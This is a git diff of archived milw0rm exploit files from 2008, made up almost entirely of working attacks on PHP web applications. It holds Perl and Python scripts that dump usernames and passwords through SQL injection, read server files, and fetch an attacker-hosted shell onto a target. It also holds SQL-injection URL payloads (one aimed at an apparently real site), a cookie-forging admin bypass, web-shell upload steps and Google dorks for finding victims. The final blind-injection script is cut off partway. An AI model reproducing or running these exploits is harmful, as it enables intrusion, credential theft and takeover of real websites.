+use Getopt::Long;
+ 
+ 
+$scriptname="PhsBlog v0.2";
+
+sub header
+{
+print "
+****************************************************
+* $scriptname
+****************************************************
+*Discovered by : Khashayar Fereidani               *
+*Exploited by : Khashayar Fereidani                *
+*My Official Website : http://fereidani.ir         *
+****************************************************";
+}
+ 
+sub usage
+{
+  print "
+* Usage : perl $0 http://Example/
+****************************************************
+";
+}                                                                                  
+ 
+
+$url = ($ARGV[0]);
+
+if(!$url)
+{
+header();
+usage();
+exit;
+}
+if($url !~ /\//){$url = $url."/";}
+if($url !~ /http:\/\//){$url = "http://".$url;}
+sub xpl1()
+{
+#concat(0x4c6f67696e3a,user,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e)
+$vul = "/index.php?sql_cid=999'union+select+0,1,2,3,4,concat(0x4c6f67696e3a,username,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e),6,7,8,9,10,11,12+from+phsblog_users/*";
+$requestpage = $url.$vul;
+
+ 
+my $req  = HTTP::Request->new("POST",$requestpage);
+$ua = LWP::UserAgent->new;
+$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
+#$req->referer($url);
+$req->referer("IRCRASH.COM");
+$req->content_type('application/x-www-form-urlencoded');
+$req->header("content-length" => $contlen);
+$req->content($poststring);
+ 
+$response = $ua->request($req);
+$content = $response->content;
+$header = $response->headers_as_string();
+ 
+@name = split(/Login:/,$content);
+$name = @name[1];
+@name = split(//,$name);
+$name = @name[0];
+ 
+@password = split(/Password:/,$content);
+$password = @password[1];
+@password = split(//,$password);
+$password = @password[0];
+
+if(!$name && !$password)
+{
+print "\n\n";
+print "!Exploit failed ! :(\n\n";
+exit;
+}
+ 
+print "\n Username: ".$name."\n\n";
+print " Password: " .$password."\n\n";
+
+ 
+}
+ 
+
+#XPL2
+
+sub xpl2()
+{
+print "\n Example For File Address : /home/user/public_html/config.php\n Or /etc/passwd";
+print "\n Enter File Address :";
+$fil3 = ;
+#index.php?sql_cid=999'union+select+0,1,2,3,4,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),6,7,8,9,10,11,12+from+phsblog_users/*
+$vul = "?show=pickup&sid=99999'+union+select+0,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),2,3,4,5,6,7,8,9,10,11,12,13+from+mysql.user/*";
+$requestpage = $url.$vul;
+ 
+my $req  = HTTP::Request->new("POST",$requestpage);
+$ua = LWP::UserAgent->new;
+$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
+#$req->referer($url);
+$req->referer("IRCRASH.COM");
+$req->content_type('application/x-www-form-urlencoded');
+$req->header("content-length" => $contlen);
+$req->content($poststring);
+
+$response = $ua->request($req);
+$content = $response->content;
+$header = $response->headers_as_string();
+
+ 
+@name = split(/Login:/,$content);
+$name = @name[1];
+@name = split(//,$name);
+$name = @name[0];
+
+
+if(!$name && !$password)
+{
+print "\n\n";
+print "!Exploit failed ! :(\n\n";
+exit;
+}
+ 
+open (FILE, ">".source.".txt");
+print FILE $name;
+close (FILE);
+print " File Save In source.txt\n";
+print "";
+ 
+}
+
+#XPL2 END
+#Starting;
+print "
+****************************************************
+* $scriptname
+****************************************************
+*Discovered by : Khashayar Fereidani               *
+*Exploited by : Khashayar Fereidani                *
+*My Official Website : http://fereidani.ir         *
+****************************************************
+* Mod Options :                                    *
+* Mod 1 : Find Script username and password        *
+* Mod 2 : File Disclosure(not work in many servers)*
+****************************************************";
+print "\n \n Enter Mod : ";
+$mod=;
+if ($mod=="1" or $mod=="2") { print "\n Exploiting .............. \n"; } else { print "\n Unknown Mod ! \n Exploit Failed !"; };
+if ($mod=="1") { xpl1(); };
+if ($mod=="2") { xpl2(); };
+
+# milw0rm.com [2008-09-11]
diff --git a/platforms/php/webapps/6432.py b/platforms/php/webapps/6432.py
index 37edf4b6a..83c23f20d 100755
--- a/platforms/php/webapps/6432.py
+++ b/platforms/php/webapps/6432.py
@@ -1,48 +1,48 @@
-#!/usr/bin/python
-#####################################################################################
-####                     minb Remote Code Execution Exploit                      ####
-#####################################################################################
-#                                                                                   #
-#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                                      #
-#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                               #
-#Our Site : Http://IRCRASH.COM                                                      #
-#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)                       #
-#####################################################################################
-#                                                                                   #
-#Site : http://minb.sf.net                                                          #
-#                                                                                   #
-#Download : http://switch.dl.sourceforge.net/sourceforge/minb/minb-0.1.0.tar.bz2    #
-#                                                                                   #
-#DORK : Powered by minb                                                             #
-#                                                                                   #
-#####################################################################################
-#                                     [Note]                                        #
-#                                                                                   #
-#All php file in this cms have this bug ;)                                          #
-#                                                                                   #
-#####################################################################################
-#                             Site : Http://IRCRASH.COM                             #
-###################################### TNX GOD ######################################
-import sys,urllib
-if len(sys.argv)<3 :
-    print "minb Remote code Execution Exploit"
-    print "Powered by : R3d.W0rm"
-    print "www.IrCrash.com"
-    print "Usage : " + sys.argv[0] + " http://Target/path http://evil/shell.txt"
-    print "Ex. " + sys.argv[0] + " http://site.com/minb http://r3d.a20.ir/r.txt"
-    exit()
-if 'http://' not in sys.argv[1] :
-    sys.argv[1]='http://' + sys.argv[1]
-if 'http://' not in sys.argv[2] :
-    sys.argv[2]='http://' + sys.argv[2]
-fp='/include/modules/top/1-random_quote.php?parse=r3d.w0rm'
-data=urllib.urlencode({'quotes_to_edit':'quotes_to_edit=";$s=fopen(\'' + sys.argv[2] + '\',r);while(!feof($s)){$shell.=fread($s,1024);};fclose($s);$fp=fopen(\'../../../upload/pictures/r3d.w0rm.php\',\'w+\');fwrite($fp,$shell);fclose($fp);/*'})
-urllib.urlopen(sys.argv[1] + fp,data)
-urllib.urlopen(sys.argv[1] + fp)
-test=urllib.urlopen(sys.argv[1] + '/upload/pictures/r3d.w0rm.php').read()
-if 'Not Found' not in test :
-    print "Shell Uploaded ."
-    print sys.argv[1] + '/upload/pictures/r3d.w0rm.php'
-exit()
-
-# milw0rm.com [2008-09-11]
+#!/usr/bin/python
+#####################################################################################
+####                     minb Remote Code Execution Exploit                      ####
+#####################################################################################
+#                                                                                   #
+#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                                      #
+#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                               #
+#Our Site : Http://IRCRASH.COM                                                      #
+#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)                       #
+#####################################################################################
+#                                                                                   #
+#Site : http://minb.sf.net                                                          #
+#                                                                                   #
+#Download : http://switch.dl.sourceforge.net/sourceforge/minb/minb-0.1.0.tar.bz2    #
+#                                                                                   #
+#DORK : Powered by minb                                                             #
+#                                                                                   #
+#####################################################################################
+#                                     [Note]                                        #
+#                                                                                   #
+#All php file in this cms have this bug ;)                                          #
+#                                                                                   #
+#####################################################################################
+#                             Site : Http://IRCRASH.COM                             #
+###################################### TNX GOD ######################################
+import sys,urllib
+if len(sys.argv)<3 :
+    print "minb Remote code Execution Exploit"
+    print "Powered by : R3d.W0rm"
+    print "www.IrCrash.com"
+    print "Usage : " + sys.argv[0] + " http://Target/path http://evil/shell.txt"
+    print "Ex. " + sys.argv[0] + " http://site.com/minb http://r3d.a20.ir/r.txt"
+    exit()
+if 'http://' not in sys.argv[1] :
+    sys.argv[1]='http://' + sys.argv[1]
+if 'http://' not in sys.argv[2] :
+    sys.argv[2]='http://' + sys.argv[2]
+fp='/include/modules/top/1-random_quote.php?parse=r3d.w0rm'
+data=urllib.urlencode({'quotes_to_edit':'quotes_to_edit=";$s=fopen(\'' + sys.argv[2] + '\',r);while(!feof($s)){$shell.=fread($s,1024);};fclose($s);$fp=fopen(\'../../../upload/pictures/r3d.w0rm.php\',\'w+\');fwrite($fp,$shell);fclose($fp);/*'})
+urllib.urlopen(sys.argv[1] + fp,data)
+urllib.urlopen(sys.argv[1] + fp)
+test=urllib.urlopen(sys.argv[1] + '/upload/pictures/r3d.w0rm.php').read()
+if 'Not Found' not in test :
+    print "Shell Uploaded ."
+    print sys.argv[1] + '/upload/pictures/r3d.w0rm.php'
+exit()
+
+# milw0rm.com [2008-09-11]
diff --git a/platforms/php/webapps/6433.txt b/platforms/php/webapps/6433.txt
index c3c95ae02..45cb64da8 100755
--- a/platforms/php/webapps/6433.txt
+++ b/platforms/php/webapps/6433.txt
@@ -1,39 +1,39 @@
-############################################################################################################
-[+] Autodealers CMS AutOnline (id) SQL Injection Vulnerability
-[+] Discovered By ZoRLu
-[+] home: z0rlu.blogspot.com & yildirimordulari.org & r00tsecurity.org & darkc0de.org                    
-[+] Greetz: str0ke, FaLCaTa, ProgenTR, Ryu, Phantom Orchid, edish, SON-KRAL & all Muslims HaCkeRs   
-[+] trt-turk@hotmail.co  &  zorlu@w.cn                 
-############################################################################################################
-[+]
-[+]
-[+]
-[+]
-
-   exploit:
-http://localhost/script_path/index.php?page=detail&id=[SQL]
-
-[+]
-[+]
-[+]
-[+]
-
-   [SQL]=
-ZoRLu'%20union%20select%20null,concat(database(),0x3a,version(),0x3a,user()),null,concat(database(),0x3a,version(),0x3a,user()),null,null,null,null,null/*
-
-[+]
-[+]
-[+]
-[+]   
-[+]
-
-   demo:
-http://www.aartsvastgoed.nl/aankoopvastgoed/index.php?page=detail&id=ZoRLu'%20union%20select%20null,concat(database(),0x3a,version(),0x3a,user()),null,concat(database(),0x3a,version(),0x3a,user()),null,null,null,null,null/*
-
-[+]
-[+] 
-[+]
-[+] 
-############################################################################################################
-
-# milw0rm.com [2008-09-11]
+############################################################################################################
+[+] Autodealers CMS AutOnline (id) SQL Injection Vulnerability
+[+] Discovered By ZoRLu
+[+] home: z0rlu.blogspot.com & yildirimordulari.org & r00tsecurity.org & darkc0de.org                    
+[+] Greetz: str0ke, FaLCaTa, ProgenTR, Ryu, Phantom Orchid, edish, SON-KRAL & all Muslims HaCkeRs   
+[+] trt-turk@hotmail.co  &  zorlu@w.cn                 
+############################################################################################################
+[+]
+[+]
+[+]
+[+]
+
+   exploit:
+http://localhost/script_path/index.php?page=detail&id=[SQL]
+
+[+]
+[+]
+[+]
+[+]
+
+   [SQL]=
+ZoRLu'%20union%20select%20null,concat(database(),0x3a,version(),0x3a,user()),null,concat(database(),0x3a,version(),0x3a,user()),null,null,null,null,null/*
+
+[+]
+[+]
+[+]
+[+]   
+[+]
+
+   demo:
+http://www.aartsvastgoed.nl/aankoopvastgoed/index.php?page=detail&id=ZoRLu'%20union%20select%20null,concat(database(),0x3a,version(),0x3a,user()),null,concat(database(),0x3a,version(),0x3a,user()),null,null,null,null,null/*
+
+[+]
+[+] 
+[+]
+[+] 
+############################################################################################################
+
+# milw0rm.com [2008-09-11]
diff --git a/platforms/php/webapps/6435.txt b/platforms/php/webapps/6435.txt
index 2a9131772..cf376c058 100755
--- a/platforms/php/webapps/6435.txt
+++ b/platforms/php/webapps/6435.txt
@@ -1,39 +1,39 @@
-  ###################################################################################
-  #                                                                                 #
-  #   ...::::: Sports Clubs Web Panel 0.0.1 SQL Injection Vulnerability ::::....    #           
-  ###################################################################################
-
-Virangar Security Team
-
-www.virangar.net
-
-
---------
-Discoverd By :virangar security team(Zahra:zh_virangar)
-
-special tnx :my master hadihadi
-
-tnx to:MR.nosrati,black.shadowes,MR.hesy,Ali007
-
-& all virangar members & all hackerz
--------
-vuln codes in /include/draw-view.php:
-
-line 22:   if(isset($_GET['id']) || isset($_POST['id'])) {
-lin 23:      $teamid = $_GET['id'].$_POST['id'];
-...
-...
-line 43:  $drawTeam = mysql_query("SELECT * FROM draw WHERE dteam = '$teamid' ORDER BY ddate");
-----------
-vuln codes in /include/draw-edit.php
-
-line 1:       $id = $_GET['id'];
-line 2:       $editDraw = mysql_query("SELECT * FROM draw WHERE did='$id' LIMIT 1");
---------
-exploit:
-http://site.com/[patch]/?p=draw-view&id='/**/union/**/select/**/1,2,3,version(),5,6,User,password%20,9/**/from/**/mysql.user/*
-http://site.com/[patch]/?p=draw-edit&id='/**/union/**/select/**/1,2,3,4,5,version(),7,8,9/*
--------------
-young iranian h4ck3rz
-
-# milw0rm.com [2008-09-11]
+  ###################################################################################
+  #                                                                                 #
+  #   ...::::: Sports Clubs Web Panel 0.0.1 SQL Injection Vulnerability ::::....    #           
+  ###################################################################################
+
+Virangar Security Team
+
+www.virangar.net
+
+
+--------
+Discoverd By :virangar security team(Zahra:zh_virangar)
+
+special tnx :my master hadihadi
+
+tnx to:MR.nosrati,black.shadowes,MR.hesy,Ali007
+
+& all virangar members & all hackerz
+-------
+vuln codes in /include/draw-view.php:
+
+line 22:   if(isset($_GET['id']) || isset($_POST['id'])) {
+lin 23:      $teamid = $_GET['id'].$_POST['id'];
+...
+...
+line 43:  $drawTeam = mysql_query("SELECT * FROM draw WHERE dteam = '$teamid' ORDER BY ddate");
+----------
+vuln codes in /include/draw-edit.php
+
+line 1:       $id = $_GET['id'];
+line 2:       $editDraw = mysql_query("SELECT * FROM draw WHERE did='$id' LIMIT 1");
+--------
+exploit:
+http://site.com/[patch]/?p=draw-view&id='/**/union/**/select/**/1,2,3,version(),5,6,User,password%20,9/**/from/**/mysql.user/*
+http://site.com/[patch]/?p=draw-edit&id='/**/union/**/select/**/1,2,3,4,5,version(),7,8,9/*
+-------------
+young iranian h4ck3rz
+
+# milw0rm.com [2008-09-11]
diff --git a/platforms/php/webapps/6436.txt b/platforms/php/webapps/6436.txt
index efbcc123b..d3d4ff30a 100755
--- a/platforms/php/webapps/6436.txt
+++ b/platforms/php/webapps/6436.txt
@@ -1,16 +1,16 @@
-----------------------------------------------------------------
-Script : PhpWebGallery 1.3.4
-Type : Vulnerabilities (blind sql injection)
-Author : Stack
-Google Dork : inurl:"picture.php?cat=" "Powered by PhpWebGallery 1.3.4"
-----------------------------------------------------------------
-Download From : http://puzzle.dl.sourceforge.net/sourceforge/phpwebgallery/phpwebgallery-1.3.4.tar.bz2
-----------------------------------------------------------------
-waiting the demo exploit
-----------------------------------------------------------------
-Exploit :
-http://site.il/phpwebgallery/picture.php?cat=[Real id]&image_id=[Real id]+and+substring(@@version,1,1)=5
-Example :
-http://site.il/phpwebgallery/picture.php?cat=3&image_id=76+and+substring(@@version,1,1)=5
-
-# milw0rm.com [2008-09-11]
+----------------------------------------------------------------
+Script : PhpWebGallery 1.3.4
+Type : Vulnerabilities (blind sql injection)
+Author : Stack
+Google Dork : inurl:"picture.php?cat=" "Powered by PhpWebGallery 1.3.4"
+----------------------------------------------------------------
+Download From : http://puzzle.dl.sourceforge.net/sourceforge/phpwebgallery/phpwebgallery-1.3.4.tar.bz2
+----------------------------------------------------------------
+waiting the demo exploit
+----------------------------------------------------------------
+Exploit :
+http://site.il/phpwebgallery/picture.php?cat=[Real id]&image_id=[Real id]+and+substring(@@version,1,1)=5
+Example :
+http://site.il/phpwebgallery/picture.php?cat=3&image_id=76+and+substring(@@version,1,1)=5
+
+# milw0rm.com [2008-09-11]
diff --git a/platforms/php/webapps/6437.txt b/platforms/php/webapps/6437.txt
index 80e13b7fa..a0e7fbee4 100755
--- a/platforms/php/webapps/6437.txt
+++ b/platforms/php/webapps/6437.txt
@@ -1,38 +1,38 @@
-#----------------------------------------------------------------
-#
-#Script : Ezphotogallery 2.1
-#
-#Type : Vulnerabilities ( Add Admin user/Remove user)
-#
-#Google Dork : "100% | 50% | 25%" "Back to gallery" inurl:"show.php?imageid="
-#
-#----------------------------------------------------------------
-#
-#Discovered by : Stack
-#
-#----------------------------------------------------------------
-#
-#Script Download :  http://heanet.dl.sourceforge.net/sourceforge/ezphotogallery/ezphotogallery-2.1.zip
-#
-#----------------------------------------------------------------
-
-Exploit :
- http://site.il/useradmin.php
-how to use exploit
-in Add user select
-----------------------------------------
-Simple example by Stack user :d :d
-----------------------------------------
-        Add user
-Name:  Stack 
-Password: passstack 
-E-mail: Stack@hotmail.fr 
-Private: yes or no  
-Administrator:  yes
-now stack username is a administrator user
-----------------------------------------
-       Remove user
-User:  chouse the user and click remove
-----------------------------------------
-
-# milw0rm.com [2008-09-11]
+#----------------------------------------------------------------
+#
+#Script : Ezphotogallery 2.1
+#
+#Type : Vulnerabilities ( Add Admin user/Remove user)
+#
+#Google Dork : "100% | 50% | 25%" "Back to gallery" inurl:"show.php?imageid="
+#
+#----------------------------------------------------------------
+#
+#Discovered by : Stack
+#
+#----------------------------------------------------------------
+#
+#Script Download :  http://heanet.dl.sourceforge.net/sourceforge/ezphotogallery/ezphotogallery-2.1.zip
+#
+#----------------------------------------------------------------
+
+Exploit :
+ http://site.il/useradmin.php
+how to use exploit
+in Add user select
+----------------------------------------
+Simple example by Stack user :d :d
+----------------------------------------
+        Add user
+Name:  Stack 
+Password: passstack 
+E-mail: Stack@hotmail.fr 
+Private: yes or no  
+Administrator:  yes
+now stack username is a administrator user
+----------------------------------------
+       Remove user
+User:  chouse the user and click remove
+----------------------------------------
+
+# milw0rm.com [2008-09-11]
diff --git a/platforms/php/webapps/6438.pl b/platforms/php/webapps/6438.pl
index e3afa92ac..3ed19198e 100755
--- a/platforms/php/webapps/6438.pl
+++ b/platforms/php/webapps/6438.pl
@@ -1,135 +1,135 @@
-#!/usr/bin/perl
-
-use LWP::UserAgent;
-use HTTP::Request;
-
-#+-------------------------------------------------------------------------------------------------+-#
-#+ Yourownbux v4.0                   ------------------------------------------------------------+--+
-#+ Cookie Modification Exploit -----------------------------------------------------------------++
-#+ Discovered By: Tec-n0x | 04/9/2008 --------------------------------------------------------++
-#
-#+ Dropsec.com
-#
-#+ Modify The Line 39, Adding More User's that can be the admin username------------+
-#+
-# + Gr33tz: Celciuz, OzX, N.O.X, MurdeR, Syst3m-c0d3r && All Friends --++
-#+-------------------------------------------------------------+----------------------------------------#
-
-
-
-system("clear");
-
-print "
-# Yourownbux v4.0 Cookie Modification Exploit\n# Discovered By: Tec-n0x\n\n# Tec-n0x [ at ] hotmail [ dot ] com > DropSec.com 
-\n\n";
-print "Target [ Example: www.sitedemo.com ] :\n> ";
-$target = ;
-chop($target);
-
-if($target =~ m/www\.(.*)\.(.*)/) {
-
-$other = $1;
-check1($target);
-
-} else {
-print "\nInvalid Target.";
-exit();
-}
-
-sub explote {
-
-@tryusers = ("admina", "administrator", "admins", "admin", "master", "manager", "root", "$other"); 
-# Add Posible Users.
-
-$check = shift;
-
-foreach $user (@tryusers) { 
-
-$pass = "Tec-n0x";
-
-print "\n\tTrying > $user\n";
-
-	$browser = LWP::UserAgent->new();
-	$browser->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14");
-	$browser->default_header("Cookie" => "usNick=$user; usPass=$pass");
-	$get = HTTP::Request->new(GET => $check);
-	$resp = $browser->request($get);
-	$content = $resp->content();
-
-@code = split("\n",$content);
-
-	foreach $checka (@code) {
-
-			if($checka =~ m/Emails|Served|Workload|Overview/) {
-
-system("clear");
-
-print "Succesfull EXPLOTED ...!!\n\nValid Username: $user\n\nGo to: $check\n\n And Put this on your browser:";
-
-$vd = "javascript\:document\.cookie = \"usNick=$user\; path=\/\"\;";
-$vda = "javascript\:document\.cookie = \"usPass=Dropsec\.com\; path=\/\"\;";
-
-print "
-
-+------------------------------------+
-+ $vd\n+ $vda
-+------------------------------------+
-";
-
-
-$yes = 1;
-
-exit();
-
-}
-}
-}
-
-if($yes != 1) {
-
-print "\n\n\nExploit Failed";
-
-exit();
-
-}
-
-}
-sub check1 {
-
-$target = shift;
-
-$check = "http\:\/\/$target\/admin\/index\.php";
-
-	$browser = LWP::UserAgent->new();
-	$browser->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14");
-	$get = HTTP::Request->new(GET => $check);
-	$resp = $browser->request($get);
-	$content = $resp->content();
-
-@code = split("\n",$content);
-
-	foreach $checka (@code) {
-
-			if($checka =~ m/You must login as administrator to access this page/) {
-
-print "Check 1 [ OK ]\n";
-
-$success = 1;
-
-explote($check);
-
-} 
-
-}
-
-if($sucess != 1) {
-
-print "Failed";
-
-exit();
-
-}
-
-}
-
-# milw0rm.com [2008-09-11]
+#!/usr/bin/perl
+
+use LWP::UserAgent;
+use HTTP::Request;
+
+#+-------------------------------------------------------------------------------------------------+-#
+#+ Yourownbux v4.0                   ------------------------------------------------------------+--+
+#+ Cookie Modification Exploit -----------------------------------------------------------------++
+#+ Discovered By: Tec-n0x | 04/9/2008 --------------------------------------------------------++
+#
+#+ Dropsec.com
+#
+#+ Modify The Line 39, Adding More User's that can be the admin username------------+
+#+
+# + Gr33tz: Celciuz, OzX, N.O.X, MurdeR, Syst3m-c0d3r && All Friends --++
+#+-------------------------------------------------------------+----------------------------------------#
+
+
+
+system("clear");
+
+print "
+# Yourownbux v4.0 Cookie Modification Exploit\n# Discovered By: Tec-n0x\n\n# Tec-n0x [ at ] hotmail [ dot ] com > DropSec.com 
+\n\n";
+print "Target [ Example: www.sitedemo.com ] :\n> ";
+$target = ;
+chop($target);
+
+if($target =~ m/www\.(.*)\.(.*)/) {
+
+$other = $1;
+check1($target);
+
+} else {
+print "\nInvalid Target.";
+exit();
+}
+
+sub explote {
+
+@tryusers = ("admina", "administrator", "admins", "admin", "master", "manager", "root", "$other"); 
+# Add Posible Users.
+
+$check = shift;
+
+foreach $user (@tryusers) { 
+
+$pass = "Tec-n0x";
+
+print "\n\tTrying > $user\n";
+
+	$browser = LWP::UserAgent->new();
+	$browser->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14");
+	$browser->default_header("Cookie" => "usNick=$user; usPass=$pass");
+	$get = HTTP::Request->new(GET => $check);
+	$resp = $browser->request($get);
+	$content = $resp->content();
+
+@code = split("\n",$content);
+
+	foreach $checka (@code) {
+
+			if($checka =~ m/Emails|Served|Workload|Overview/) {
+
+system("clear");
+
+print "Succesfull EXPLOTED ...!!\n\nValid Username: $user\n\nGo to: $check\n\n And Put this on your browser:";
+
+$vd = "javascript\:document\.cookie = \"usNick=$user\; path=\/\"\;";
+$vda = "javascript\:document\.cookie = \"usPass=Dropsec\.com\; path=\/\"\;";
+
+print "
+
++------------------------------------+
++ $vd\n+ $vda
++------------------------------------+
+";
+
+
+$yes = 1;
+
+exit();
+
+}
+}
+}
+
+if($yes != 1) {
+
+print "\n\n\nExploit Failed";
+
+exit();
+
+}
+
+}
+sub check1 {
+
+$target = shift;
+
+$check = "http\:\/\/$target\/admin\/index\.php";
+
+	$browser = LWP::UserAgent->new();
+	$browser->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14");
+	$get = HTTP::Request->new(GET => $check);
+	$resp = $browser->request($get);
+	$content = $resp->content();
+
+@code = split("\n",$content);
+
+	foreach $checka (@code) {
+
+			if($checka =~ m/You must login as administrator to access this page/) {
+
+print "Check 1 [ OK ]\n";
+
+$success = 1;
+
+explote($check);
+
+} 
+
+}
+
+if($sucess != 1) {
+
+print "Failed";
+
+exit();
+
+}
+
+}
+
+# milw0rm.com [2008-09-11]
diff --git a/platforms/php/webapps/6439.txt b/platforms/php/webapps/6439.txt
index de1864083..c9235a9ac 100755
--- a/platforms/php/webapps/6439.txt
+++ b/platforms/php/webapps/6439.txt
@@ -1,18 +1,18 @@
---==+============================================================================+==--
---==+   Sports Clubs Web Panel 0.0.1 Remote File upload                          +==--   
---==+============================================================================+==--
-
- [*] Discovered By: Stack
- [+] Discovered On: 11 Sep 2008
- [+] Download: http://sourceforge.net/project/downloading.php?group_id=188949&use_mirror=ovh&filename=sportspanel-0.0.1a.tar.gz&50146370
-
-hello guys in this script admin need make a directory name grounds in public directory of script for the 'Add Ground' functions work
-so then its will be useful for us use this exploit :d
-Exploit :
-http://localhost/sport/?p=grounds-add
-after write any nae in Ground Name select
-upload you php script and go to
-http://localhost/sport/grounds/
-you can see your php file uploaded
-
-# milw0rm.com [2008-09-12]
+--==+============================================================================+==--
+--==+   Sports Clubs Web Panel 0.0.1 Remote File upload                          +==--   
+--==+============================================================================+==--
+
+ [*] Discovered By: Stack
+ [+] Discovered On: 11 Sep 2008
+ [+] Download: http://sourceforge.net/project/downloading.php?group_id=188949&use_mirror=ovh&filename=sportspanel-0.0.1a.tar.gz&50146370
+
+hello guys in this script admin need make a directory name grounds in public directory of script for the 'Add Ground' functions work
+so then its will be useful for us use this exploit :d
+Exploit :
+http://localhost/sport/?p=grounds-add
+after write any nae in Ground Name select
+upload you php script and go to
+http://localhost/sport/grounds/
+you can see your php file uploaded
+
+# milw0rm.com [2008-09-12]
diff --git a/platforms/php/webapps/6440.pl b/platforms/php/webapps/6440.pl
index 6130bb2af..ee70aa58c 100755
--- a/platforms/php/webapps/6440.pl
+++ b/platforms/php/webapps/6440.pl
@@ -1,215 +1,215 @@
-#!/usr/bin/perl -W
- 
-#
-# PhpWebGallery 1.3.4 Blind SQL Injection Exploit
-# Download: http://puzzle.dl.sourceforge.net/sourceforge/phpwebgallery/phpwebgallery-1.3.4.tar.bz2
-# File affected: picture.php
-#
-# exploit written by ka0x 
-# D.O.M Labs - Security Researchers
-# - www.domlabs.org -
-#
-# ka0x@domlabs:~/codes$ ./phpwebgallery.pl -u "http://localhost/gallery/picture.php?cat=1&image_id=1"
-# [i] Getting default: -T 30
-# [i] Getting default: -l 200
-# [i] Getting default: -t 15
-# 21 118 v
-# [!] $EXIT_IF_NO_CHAR : I can't find a valid character, position 18.
-# [i] USER / PASSWORD:
-# admin / php_gallery_
-#
-#
- 
-
-my $MAX_FIELD_LENGTH = 200 ;
-my $EXIT_IF_NO_CHAR = 1 ;
-my $DEFAULT_THREADS = 15 ;
-my $DEFAULT_THREADS_TIMEOUT = 30 ;
-my @ascii = ( 32 .. 123 ) ;
-my $DEFAULT_THREADS_TIME = 1 ;
-my $pattern = 'Powered'; 
-
- 
-use LWP::UserAgent ;
- 
-sub _HELP_AND_EXIT
-{
-    die "
- 
-  ./$0 -u 
- 
- Options:
-  -u                   Ex: http://localhost/picture.php?cat=1&image_id=1
- 
- Other:
-  -t    <#>                 Threads, default '$DEFAULT_THREADS'.
-  -l    <#>                 Maximum table name length '$MAX_FIELD_LENGTH'.
-  -T    <#>                 Timeout.
-  -h                        Help (also with --help).
- 
-  Example:
- 
-  ./$0 -u \"http://localhost/gallery/picture.php?cat=1&image_id=1\"
- 
-" ;
-}
- 
- 
-my ($p, $w) = ({ @ARGV }, { }) ;
- 
-map {
-	&_HELP_AND_EXIT if $_ eq '--help' or $_ eq '-h' ;
-} keys %$p ;
- 
-map {
-	die "[!] Require: $_\n[!] Help: ./$0 --help\n" unless $p->{ $_ } ;
-} qw/-u/ ;
- 
-$p->{'-t'} = ( $p->{'-t'} and $p->{'-t'} =~ /^\d+$/ ) ? $p->{'-t'} : ( $w->{'-t'} = $DEFAULT_THREADS ) ;
-$p->{'-l'} = ( $p->{'-l'} and $p->{'-l'} =~ /^\d+$/ ) ? $p->{'-l'} : ( $w->{'-l'} = $MAX_FIELD_LENGTH ) ;
-$p->{'-T'} = ( $p->{'-T'} and $p->{'-T'} =~ /^\d+$/ ) ? $p->{'-T'} : ( $w->{'-T'} = $DEFAULT_THREADS_TIMEOUT ) ;
- 
-map {
-	warn "[i] Getting default: $_ $w->{ $_ }\n" ;
-} sort keys %$w ;
- 
-( &_IS_VULN( $p ) ) ? &_START_WORK( $p ) : die "[i] Bad pattern ? Isn't vulnerable ?\n" ;
- 
- 
-
-sub _START_WORK
-{
-	my $p = shift ;
-	my $position = 1 ;
-
-	pipe(R, W) ;
-	pipe(Rs, Ws) ;
-	autoflush STDOUT 1 ;
- 
-	my $sql_message = '' ;
-	my $msg = '' ;
-	my @pid ;
- 
-	while( $position <= $p->{'-l'} )
-    {
-		my $cf ;
-		unless( $cf = fork ){ &_CHECKING( $p, $position ) ; exit(0) ; }
-		push(@pid, $cf) ;
- 
-		my $count = 0 ;
-		my $can_exit ;
-		my $char_printed ;
- 
-        while()
-        {
-			chomp ;
-			push(@pid, (split(/:/))[1] ) if /^pid/ ;
- 
-			my ($res, $pos, $ascii) = ( split(/ /, $_) ) ;
-			$count++ if $pos == $position ;
-
-			print "\b" x length($msg), ($msg = "$position $ascii " . chr($ascii) ) ;
- 
-			if( $res eq 'yes' and $pos == $position ){
-				$char_printed = $can_exit = 1 ;
-				print Ws "STOP $position\n" ;
-				$sql_message .= chr( $ascii ) ;
-			}
- 
-            last if ( $can_exit or $count == @ascii );
-		}
- 
-        map { 
-			waitpid($_, 0) 
-		} @pid ;
- 
-		unless( $char_printed )
-        {
-			if( $EXIT_IF_NO_CHAR )
-            {
-				warn "\n[!] \$EXIT_IF_NO_CHAR : I can't find a valid character, position $position.\n"  ;
-				last ;
- 			}
-		}
-		$position++ ;
-    }
-
-    print "[i] USER / PASSWORD:\n$sql_message\n" ;
-
-}
- 
-sub _CHECKING
-{
-	my ($p, $position) = @_ ;
-	my $counter = 0 ;
- 
-    foreach my $ascii ( @ascii )
-    {
-		$counter++ ;
- 
-		if( $counter % $p->{'-t'} == 0 )
-        {
-			my $stop_position ;
-			eval
-			{
-				$SIG{'ALRM'} = sub { 
-					die "non_stop\n" 
-				} ;
-
-				alarm $DEFAULT_THREADS_TIME ;
-				my $line =  ;
-				$stop_position = (split( / /, $line))[1] ;
-				alarm 0 ;
-			} ;
- 
-			if( ($stop_position) and $stop_position == $position ){ 
-				print "\nnext position\n" ; 
-				exit(0) ; 
-			}
-		}
- 
-        unless(my $pid = fork )
-        {
